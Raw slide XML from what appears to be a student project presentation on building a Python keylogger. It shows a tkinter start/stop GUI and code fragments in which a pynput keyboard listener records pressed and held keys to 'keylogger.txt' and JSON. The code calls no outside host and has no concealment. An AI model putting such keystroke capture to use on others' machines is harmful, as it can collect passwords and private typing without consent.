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techtrainer20/TNSD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KEYLOGGERS</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Sanjay m</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Dmi College of Engineering-IT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ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-42707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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="480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start_keylogger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start_keylogger():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listener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listener = keyboard.Listener(on_press=on_press, on_release=on_release)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listener.start()</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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config(state='disabled')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stop_button.config(state='normal')</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stop_keylogger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stop_keylogger():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listener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listener.stop()</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label.config(text="Keylogger stopped.")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start_button</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RESULT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="177" name="Google Shape;177;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991300" cy="342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RESULT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487700" cy="752700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250408" cy="15634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CONCLUSION</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901232" y="0"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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b="1" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</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Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</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Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</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Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</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Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</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Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029500" cy="530400"/>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3300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="3300" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>FUTURE SCOPE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REFERENCES</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;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a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2208"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="240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58649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PROBLEM STATEMENT</a:t>
            </a:r>
            <a:endParaRPr sz="3959"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="323232"/>
            <a:ext cx="11029500" cy="4673400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629434" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2208"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>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PROPOSED SOLUTION</a:t>
            </a:r>
            <a:endParaRPr sz="3959"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909017" y="233938"/>
            <a:ext cx="11613600" cy="55641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656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To overcome the limitations of the existing keylogger program, we propose to develop a new keylogger with the following features:</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Improved keylogging functionality: The new keylogger will be able to differentiate between key presses and key releases and record them separately.</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GUI for easy start and stop of the keylogger: The new keylogger will have a GUI that allows the user to start and stop the keylogger with a single click.</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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</a:t>
            </a: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SYSTEM  APPROACH</a:t>
            </a:r>
            <a:endParaRPr sz="3959">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	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1092492"/>
            <a:ext cx="11319600" cy="3894000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="198375" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="198375">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Libre Franklin"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Libre Franklin"/>
              <a:ea typeface="Libre Franklin"/>
              <a:cs typeface="Libre Franklin"/>
              <a:sym typeface="Libre Franklin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Design the GUI: Create a simple GUI using tkinter that includes a start and stop button.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-IN" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> library to capture the key presses and releases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-IN" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> library to generate a JSON file that contains the</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> keylogging data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Libre Franklin"/>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ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380989" y="477169"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;143;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="15242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ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218429" y="-43123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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Google Shape;150;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955280" cy="466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ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-42707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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="563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Initialize the variables</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keys_used = []</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flag = False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keys =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on_press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on_press(key):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flag, keys_used, keys</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if flag == False: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keys_used.append(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{'Pressed': f'{key}'}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flag = True</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if flag == True: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keys_used.append(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{'Held': f'{key}'}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IN" sz="3959">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-42707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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
